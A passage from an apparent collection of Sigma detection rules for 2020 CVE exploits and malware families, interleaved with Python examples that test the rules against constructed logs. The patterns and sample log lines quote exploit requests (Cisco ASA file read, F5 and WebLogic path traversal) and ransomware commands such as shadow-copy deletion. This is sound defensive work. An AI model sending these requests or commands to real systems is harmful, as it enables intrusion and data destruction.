    "content": "title: Cisco ASA FTD Exploit CVE-2020-3452\nid: aba47adc-4847-4970-95c1-61dce62a8b29\nstatus: test\ndescription: Detects exploitation attempts against Cisco ASA/FTD systems exploiting CVE-2020-3452 that were answered with HTTP status code 200 (successful exploitation)\nreferences:\n    - https://twitter.com/aboul3la/status/1286012324722155525\n    - https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-01-07\nmodified: 2023-01-02\ntags:\n    - attack.t1190\n    - attack.initial-access\n    - cve.2020-3452\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_endpoint:\n        cs-uri-query|contains:\n            - '+CSCOT+/translation-table'\n            - '+CSCOT+/oem-customization'\n    selection_path_select:\n        cs-uri-query|contains:\n            - '&textdomain=/'\n            - '&textdomain=%'\n            - '&name=/'\n            - '&name=%'\n    select_status_code:\n        sc-status: 200\n    condition: selection_endpoint and selection_path_select and select_status_code\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
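The WebLogic (CVE-2020-14882) and Cisco ASA/FTD (CVE-2020-3452) rules above both match substrings of the request target, and the Cisco rule additionally requires `sc-status` 200. The Python below is an added example, not Sigma project code: it parses constructed Apache-style access-log lines onto the field names the rules use and applies both rules as plain functions. Two points it makes that the YAML alone does not: Sigma webserver rules put the whole request target (path and query) in `cs-uri-query`, since patterns such as `/console/images/...` are path components; and the WebLogic pattern is the double-URL-encoded `%252E%252E%252F`, so matching must run on the request as logged. A pipeline that URL-decodes once before matching turns it into `%2E%2E%2F` and the rule no longer fires, which `decode_first=True` demonstrates. The log lines, IP addresses and function names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access-log lines (not real traffic).
# Line 1: the CVE-2020-14882 traversal, double-encoded as attackers send it.
# Lines 2-3: the CVE-2020-3452 file-read request, answered 200 and then 404.
# Line 4: a benign request that shares a path prefix with the 14882 pattern.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Nov/2020:10:15:01 +0000] "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.6 - - [07/Jan/2021:08:00:12 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 4411 "-" "curl/7.68.0"
10.0.0.6 - - [07/Jan/2021:08:00:13 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 404 212 "-" "curl/7.68.0"
10.0.0.7 - - [07/Jan/2021:09:30:00 +0000] "GET /console/css/site.css HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line, status; the remainder of the line is ignored.
LOG_RE = re.compile(
    r'^(?P<c_ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_access_line(line: str) -> dict:
    """Map one access-log line onto the field names Sigma webserver rules use.
    The whole request target goes into cs-uri-query (the rules match path
    components there), and it is kept exactly as logged: no URL decoding."""
    m = LOG_RE.match(line)
    if not m:
        raise ValueError(f"unparseable line: {line!r}")
    return {
        "c-ip": m.group("c_ip"),
        "cs-method": m.group("method"),
        "cs-uri-query": m.group("target"),
        "sc-status": int(m.group("status")),
    }


def cve_2020_14882(ev: dict) -> bool:
    # selection: cs-uri-query|contains (any of the listed patterns)
    return any(p in ev["cs-uri-query"] for p in (
        "/console/images/%252E%252E%252Fconsole.portal",
        "/console/css/%2e",
    ))


def cve_2020_3452(ev: dict) -> bool:
    # condition: selection_endpoint and selection_path_select and select_status_code
    q = ev["cs-uri-query"]
    endpoint = any(p in q for p in ("+CSCOT+/translation-table", "+CSCOT+/oem-customization"))
    path_select = any(p in q for p in ("&textdomain=/", "&textdomain=%", "&name=/", "&name=%"))
    return endpoint and path_select and ev["sc-status"] == 200


RULES = {"CVE-2020-14882": cve_2020_14882, "CVE-2020-3452": cve_2020_3452}


def scan(log_text: str, decode_first: bool = False) -> list[tuple[str, str]]:
    """Return (rule name, client IP) for every line that fires a rule.
    decode_first=True simulates a pipeline that URL-decodes the request once
    before matching, which silently loses the double-encoded 14882 pattern."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_access_line(line)
        if decode_first:
            ev["cs-uri-query"] = unquote(ev["cs-uri-query"])
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev["c-ip"]))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("raw    :", hit)
    for hit in scan(SAMPLE_LOG, decode_first=True):
        print("decoded:", hit)
```

Run as-is it reports both exploitation attempts from the raw log, but only the Cisco one once the request has been decoded; the 404 response to the same Cisco request is correctly ignored because the rule requires status 200.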
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-5902/web_cve_2020_5902_f5_bigip.yml",
    "content": "title: CVE-2020-5902 F5 BIG-IP Exploitation Attempt\nid: 44b53b1c-e60f-4a7b-948e-3435a7918478\nstatus: test\ndescription: Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902\nreferences:\n    - https://support.f5.com/csp/article/K52145254\n    - https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/\n    - https://twitter.com/yorickkoster/status/1279709009151434754\n    - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-05\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2020-5902\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_base:\n        cs-uri-query|contains:\n            - '/tmui/'\n            - '/hsqldb'\n    selection_traversal:\n        cs-uri-query|contains:\n            - '..;/'\n            - '.jsp/..'\n    condition: selection_base and selection_traversal\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-8193/web_cve_2020_8193_8195_citrix_exploit.yml",
    "content": "title: Citrix ADC Exploitation CVE-2020-8193 CVE-2020-8195\nid: 0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7\nstatus: test\ndescription: Detects exploitation attempts against Citrix NetScaler, Application Delivery Controller (ADC) and Citrix Gateway exploiting the vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195\nreferences:\n    - https://support.citrix.com/article/CTX276688\n    - https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/\n    - https://dmaasland.github.io/posts/citrix.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-10\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2020-8193\n    - cve.2020-8195\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection1:\n        cs-uri-query|contains: '/rapi/filedownload?filter=path:%2F'\n    selection2:\n        cs-uri-query|contains|all:\n            - '/pcidss/report'\n            - 'type=all_signatures'\n            - 'sig_name=_default_signature_'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml",
    "content": "title: Blue Mockingbird\nid: c3198a27-23a0-4c2c-af19-e5328d49680e\nrelated:\n    - id: ce239692-aa94-41b3-b32f-9cab259c96ea\n      type: merged\nstatus: test\ndescription: Attempts to detect system changes made by Blue Mockingbird\nreferences:\n    - https://redcanary.com/blog/blue-mockingbird-cryptominer/\nauthor: Trent Liffick (@tliffick)\ndate: 2020-05-14\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1112\n    - attack.t1047\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    sc_cmd:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - 'sc config'\n            - 'wercplsupporte.dll'\n    wmic_cmd:\n        Image|endswith: '\\wmic.exe'\n        CommandLine|endswith: 'COR_PROFILER'\n    condition: sc_cmd or wmic_cmd\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Malware/Blue-Mockingbird/registry_set_mal_blue_mockingbird.yml",
    "content": "title: Blue Mockingbird - Registry\nid: 92b0b372-a939-44ed-a11b-5136cf680e27\nrelated:\n    - id: c3198a27-23a0-4c2c-af19-e5328d49680e\n      type: derived\nstatus: test\ndescription: Attempts to detect system changes made by Blue Mockingbird\nreferences:\n    - https://redcanary.com/blog/blue-mockingbird-cryptominer/\nauthor: Trent Liffick (@tliffick)\ndate: 2020-05-14\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.persistence\n    - attack.t1112\n    - attack.t1047\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Malware/ComRAT/proxy_malware_comrat_network_indicators.yml",
    "content": "title: ComRAT Network Communication\nid: 7857f021-007f-4928-8b2c-7aedbe64bb82\nstatus: test\ndescription: Detects Turla ComRAT network communication.\nreferences:\n    - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-05-26\nmodified: 2024-02-26\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.g0010\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains: '/index/index.php\\?h='\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml",
    "content": "title: Potential Emotet Rundll32 Execution\nid: 54e57ce3-0672-46eb-a402-2c0948d5e3e9\nstatus: test\ndescription: Detects Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL\nreferences:\n    - https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html\n    - https://cyber.wtf/2021/11/15/guess-whos-back/\nauthor: FPT.EagleEye\ndate: 2020-12-25\nmodified: 2023-02-21\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|endswith:\n            - ',RunDLL'\n            - ',Control_RunDLL'\n            # - ',#1'  too generic - function load by ordinal is not Emotet specific\n    filter_legitimate_dll:\n        CommandLine|endswith:\n            - '.dll,Control_RunDLL'\n            - '.dll\",Control_RunDLL'\n            - '.dll'',Control_RunDLL'\n    filter_ide:\n        ParentImage|endswith: '\\tracker.exe' # When Visual Studio compiles a NodeJS program it may use MSBuild to create tracker.exe, and tracker.exe then spawns rundll32.exe\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
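The DNS RCE rule (CVE-2020-1350) earlier in this section uses `selection and not filter`; the Emotet rundll32 rule above combines an OR-list selection (`selection_img` is a list of maps) with `all of selection_* and not 1 of filter_*`. The Python below is an added example, not Sigma or pySigma code: it implements just enough of Sigma's matching semantics (`endswith`, `startswith`, `contains`, the `all` modifier, list-of-maps OR, and case-insensitive comparison, which is Sigma's default) to run both rules over constructed Sysmon Event ID 1 style events. Wildcards are not implemented because neither rule uses them. The events and the function names are made up for the example.

```python
from typing import Any


def _match_value(value: str, pattern: str, modifiers: list[str]) -> bool:
    """Apply Sigma string modifiers. Sigma string matching is case-insensitive
    by default, so both sides are lower-cased; an unmodified field is an
    exact match. Wildcards (*, ?) are deliberately not handled here."""
    value, pattern = value.lower(), pattern.lower()
    if "endswith" in modifiers:
        return value.endswith(pattern)
    if "startswith" in modifiers:
        return value.startswith(pattern)
    if "contains" in modifiers:
        return pattern in value
    return value == pattern


def _match_field(event: dict, key: str, patterns: Any) -> bool:
    """'Field|mod1|mod2: value-or-list'. A list is OR unless 'all' is present."""
    field, *modifiers = key.split("|")
    value = event.get(field)
    if value is None:
        return False
    if not isinstance(patterns, list):
        patterns = [patterns]
    results = [_match_value(str(value), str(p), modifiers) for p in patterns]
    return all(results) if "all" in modifiers else any(results)


def match_selection(event: dict, selection: Any) -> bool:
    """A map is AND over its fields; a list of maps is OR over the maps."""
    if isinstance(selection, list):
        return any(match_selection(event, s) for s in selection)
    return all(_match_field(event, k, v) for k, v in selection.items())


# Detection sections transcribed from the two rules' YAML.
DNS_RCE = {
    "selection": {"ParentImage|endswith": "\\System32\\dns.exe"},
    "filter": {"Image|endswith": [
        "\\System32\\werfault.exe", "\\System32\\conhost.exe",
        "\\System32\\dnscmd.exe", "\\System32\\dns.exe"]},
}

EMOTET_RUNDLL32 = {
    "selection_img": [
        {"Image|endswith": "\\rundll32.exe"},
        {"OriginalFileName": "RUNDLL32.EXE"},
    ],
    "selection_cli": {"CommandLine|endswith": [",RunDLL", ",Control_RunDLL"]},
    "filter_legitimate_dll": {"CommandLine|endswith": [
        ".dll,Control_RunDLL", ".dll\",Control_RunDLL", ".dll',Control_RunDLL"]},
    "filter_ide": {"ParentImage|endswith": "\\tracker.exe"},
}


def dns_rce_fires(event: dict) -> bool:
    # condition: selection and not filter
    return (match_selection(event, DNS_RCE["selection"])
            and not match_selection(event, DNS_RCE["filter"]))


def emotet_fires(event: dict) -> bool:
    # condition: all of selection_* and not 1 of filter_*
    sels = [v for k, v in EMOTET_RUNDLL32.items() if k.startswith("selection_")]
    filts = [v for k, v in EMOTET_RUNDLL32.items() if k.startswith("filter_")]
    return (all(match_selection(event, s) for s in sels)
            and not any(match_selection(event, f) for f in filts))


# Constructed Sysmon Event ID 1 style events (not real telemetry).
EVENTS = [
    {"ParentImage": "C:\\Windows\\System32\\dns.exe",               # dns.exe -> cmd.exe: fires
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c whoami", "OriginalFileName": "Cmd.Exe"},
    {"ParentImage": "C:\\Windows\\System32\\dns.exe",               # dns.exe -> conhost.exe: filtered
     "Image": "C:\\Windows\\System32\\conhost.exe",
     "CommandLine": "\\??\\C:\\Windows\\system32\\conhost.exe 0x4", "OriginalFileName": "CONHOST.EXE"},
    {"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "Image": "C:\\Windows\\System32\\rundll32.exe",                  # .tmp,RunDLL: Emotet pattern
     "CommandLine": "rundll32.exe C:\\Users\\Public\\ab12.tmp,RunDLL", "OriginalFileName": "RUNDLL32.EXE"},
    {"ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\rundll32.exe",                  # shell32.dll,Control_RunDLL: benign
     "CommandLine": "\"C:\\Windows\\system32\\rundll32.exe\" C:\\Windows\\system32\\shell32.dll,Control_RunDLL",
     "OriginalFileName": "RUNDLL32.EXE"},
]


def run_rules(events: list[dict]) -> list[list[str]]:
    """Return, per event, the names of the rules that fired on it."""
    out = []
    for ev in events:
        fired = []
        if dns_rce_fires(ev):
            fired.append("CVE-2020-1350")
        if emotet_fires(ev):
            fired.append("Emotet-rundll32")
        out.append(fired)
    return out


if __name__ == "__main__":
    for ev, fired in zip(EVENTS, run_rules(EVENTS)):
        print(ev["Image"], "->", fired or "no match")
```

The fourth event shows why `filter_legitimate_dll` exists: the command line ends in `,Control_RunDLL`, but because the module is a real `.dll` the filter removes it, whereas the `.tmp` module in the third event is what Emotet actually loads and stays.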
  {
    "path": "rules-emerging-threats/2020/Malware/FlowCloud/registry_event_malware_flowcloud_markers.yml",
    "content": "title: FlowCloud Registry Markers\nid: 5118765f-6657-4ddb-a487-d7bd673abbf1\nstatus: test\ndescription: |\n    Detects FlowCloud malware registry markers from threat group TA410.\n    The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.\nreferences:\n    - https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new\nauthor: NVISO\ndate: 2020-06-09\nmodified: 2024-03-20\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1112\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\HARDWARE\\{2DB80286-1784-48b5-A751-B6ED1F490303}'\n            - '\\HARDWARE\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}'\n            - '\\HARDWARE\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}'\n            - '\\SYSTEM\\Setup\\PrintResponsor\\'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml",
    "content": "title: Potential Ke3chang/TidePool Malware Activity\nid: 7b544661-69fc-419f-9a59-82ccc328f205\nstatus: test\ndescription: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020\nreferences:\n    - https://web.archive.org/web/20200618080300/https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf\n    - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/\nauthor: Markus Neis, Swisscom\ndate: 2020-06-18\nmodified: 2023-03-10\ntags:\n    - attack.g0004\n    - attack.defense-evasion\n    - attack.t1562.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Ke3chang and TidePool both modify the IEHarden registry key, as well as the following list of keys.\n        # Setting these registry keys is unique to the Ke3chang and TidePool malware families.\n        # HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Check_Associations\n        # HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize\n        # HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IEharden\n        CommandLine|contains:\n            - '-Property DWORD -name DisableFirstRunCustomize -value 2 -Force'\n            - '-Property String -name Check_Associations -value'\n            - '-Property DWORD -name IEHarden -value 0 -Force'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml",
    "content": "title: Potential Maze Ransomware Activity\nid: 29fd07fc-9cfd-4331-b7fd-cc18dfa21052\nstatus: test\ndescription: Detects specific process characteristics of Maze ransomware word document droppers\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\n    - https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/\n    - https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-05-08\nmodified: 2023-02-13\ntags:\n    - attack.execution\n    - attack.t1204.002\n    - attack.t1047\n    - attack.impact\n    - attack.t1490\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Dropper\n    selection1:\n        ParentImage|endswith: '\\WINWORD.exe'\n        Image|endswith: '.tmp'\n    # Binary Execution\n    selection2:\n        Image|endswith: '\\wmic.exe'\n        ParentImage|contains: '\\Temp\\'\n        CommandLine|endswith: 'shadowcopy delete'\n    # Specific Pattern\n    selection3:\n        CommandLine|endswith: 'shadowcopy delete'\n        CommandLine|contains: '\\..\\..\\system32'\n    condition: 1 of selection*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/Malware/Trickbot/proc_creation_win_malware_trickbot_wermgr.yml",
    "content": "title: Trickbot Malware Activity\nid: 58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27\nrelated:\n    - id: c37510b8-2107-4b78-aa32-72f251e7a844\n      type: similar\nstatus: stable\ndescription: Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"\nreferences:\n    - https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20\n    - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-11-26\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.t1559\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\wermgr.exe'\n        ParentImage|endswith: '\\rundll32.exe'\n        ParentCommandLine|contains: 'DllRegisterServer'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml",
    "content": "title: EvilNum APT Golden Chickens Deployment Via OCX Files\nid: 8acf3cfa-1e8c-4099-83de-a0c4038e18f0\nstatus: test\ndescription: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report\nreferences:\n    - https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/\n    - https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-10\nmodified: 2023-03-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'regsvr32'\n            - '/s'\n            - '/i'\n            - '\\AppData\\Roaming\\'\n            - '.ocx'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml",
    "content": "title: GALLIUM IOCs\nid: 440a56bf-7873-4439-940a-1c8a671073c2\nstatus: test\ndescription: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.\nreferences:\n    - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/\n    - https://github.com/Azure/Azure-Sentinel/blob/a02ce85c96f162de6f8cc06f07a53b6525f0ff7f/Solutions/Legacy%20IOC%20based%20Threat%20Protection/Analytic%20Rules/GalliumIOCs.yaml\nauthor: Tim Burrell\ndate: 2020-02-07\nmodified: 2024-11-23\ntags:\n    - attack.credential-access\n    - attack.command-and-control\n    - attack.t1212\n    - attack.t1071\n    - attack.g0093\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Hashes|contains:\n            - 'SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd'\n            - 'SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b'\n            - 'SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5'\n            - 'SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29'\n            - 'SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77'\n            - 'SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3'\n            - 'SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022'\n            - 'SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883'\n            - 'SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e'\n            - 'SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7'\n            - 'SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1'\n            - 'SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c'\n            - 'SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945'\n            - 'SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9'\n            - 'SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79'\n            - 'SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf'\n            - 'SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08'\n            - 'SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef'\n            - 'SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070'\n            - 'SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635'\n            - 'SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19'\n            - 'SHA1=aeb573accfd95758550cf30bf04f389a92922844'\n            - 'SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a'\n            - 'SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196'\n            - 'SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d'\n            - 'SHA1=e841a63e47361a572db9a7334af459ddca11347a'\n            - 'SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d'\n            - 'SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b'\n            - 'SHA1=dd44133716b8a241957b912fa6a02efde3ce3025'\n            - 'SHA1=8793bf166cb89eb55f0593404e4e933ab605e803'\n            - 'SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138'\n            - 'SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea'\n            - 'SHA1=d209430d6af54792371174e70e27dd11d3def7a7'\n            - 'SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0'\n            - 'SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a'\n            - 'SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f'\n            - 'SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de'\n            - 'SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
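The GALLIUM IOC rule above matches `Hashes|contains: 'SHA256=...'` against Sysmon's `Hashes` field, which is a comma-separated list of `ALGO=hex` pairs; which algorithms appear depends on the Sysmon `HashAlgorithms` setting, and Sysmon writes the digests in upper case, which only works with the rule's lowercase patterns because Sigma matching is case-insensitive. The Python below is an added example, not Sigma project code: it parses the field into a per-algorithm dictionary and checks each digest against an IOC set built from three hashes taken from the rule, so a hit is reported together with the algorithm that matched rather than by substring. The events, the benign digests and the function names are constructed.

```python
# Three indicators copied from the rule above; the rest would simply be added
# to these sets.
IOC_SHA256 = {
    "9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd",
    "7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b",
}
IOC_SHA1 = {"53a44c2396d15c3a03723fa5e5db54cafd527635"}
IOCS = {"SHA256": IOC_SHA256, "SHA1": IOC_SHA1}


def parse_hashes(field: str) -> dict[str, str]:
    """Parse Sysmon's Hashes field, e.g. 'SHA1=..,MD5=..,SHA256=..,IMPHASH=..',
    into {ALGO: lowercase hex}. Pairs without '=' or with an empty digest are
    skipped; case is normalised so upper-case Sysmon output matches IOC lists."""
    out = {}
    for part in field.split(","):
        algo, sep, digest = part.partition("=")
        if sep and digest.strip():
            out[algo.strip().upper()] = digest.strip().lower()
    return out


def ioc_match(field: str) -> list[tuple[str, str]]:
    """Return (algorithm, digest) pairs from the field that are known IOCs."""
    hashes = parse_hashes(field)
    return [(algo, h) for algo, h in hashes.items() if h in IOCS.get(algo, set())]


# Constructed (Image, Hashes) pairs in the shape Sysmon Event ID 1 logs them.
# The first event carries two GALLIUM digests; the other two are benign
# placeholder values, not real file hashes.
EVENTS = [
    ("C:\\Windows\\Temp\\svchost.exe",
     "SHA1=53A44C2396D15C3A03723FA5E5DB54CAFD527635,MD5=00000000000000000000000000000000,"
     "SHA256=9AE7C4A4E1CFE9B505C3A47E66551EB1357AFFEE65BFEFB0109D02F4E97C06DD,"
     "IMPHASH=00000000000000000000000000000000"),
    ("C:\\Windows\\System32\\notepad.exe",
     "SHA256=f5c4d7b3b6b3a3bd3e5bd2a8a3a7a8b58d6ce7f4cb9c2f9e6b6f8a4a3c2d1e0f"),
    ("C:\\Windows\\System32\\calc.exe", "MD5=11111111111111111111111111111111"),
]


def scan_events(events: list[tuple[str, str]]) -> list[tuple[str, list[tuple[str, str]]]]:
    """Return (Image, matches) for every event with at least one IOC hit."""
    results = []
    for image, hashes in events:
        matches = ioc_match(hashes)
        if matches:
            results.append((image, matches))
    return results


if __name__ == "__main__":
    for image, matches in scan_events(EVENTS):
        print(image)
        for algo, digest in matches:
            print(f"  {algo} {digest}")
```

Indexing the parsed digests this way also lets the same IOC list be applied to telemetry that logs hashes in separate fields (most EDRs do), where the `Hashes|contains` substring form of the rule cannot be used directly.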
  {
    "path": "rules-emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml",
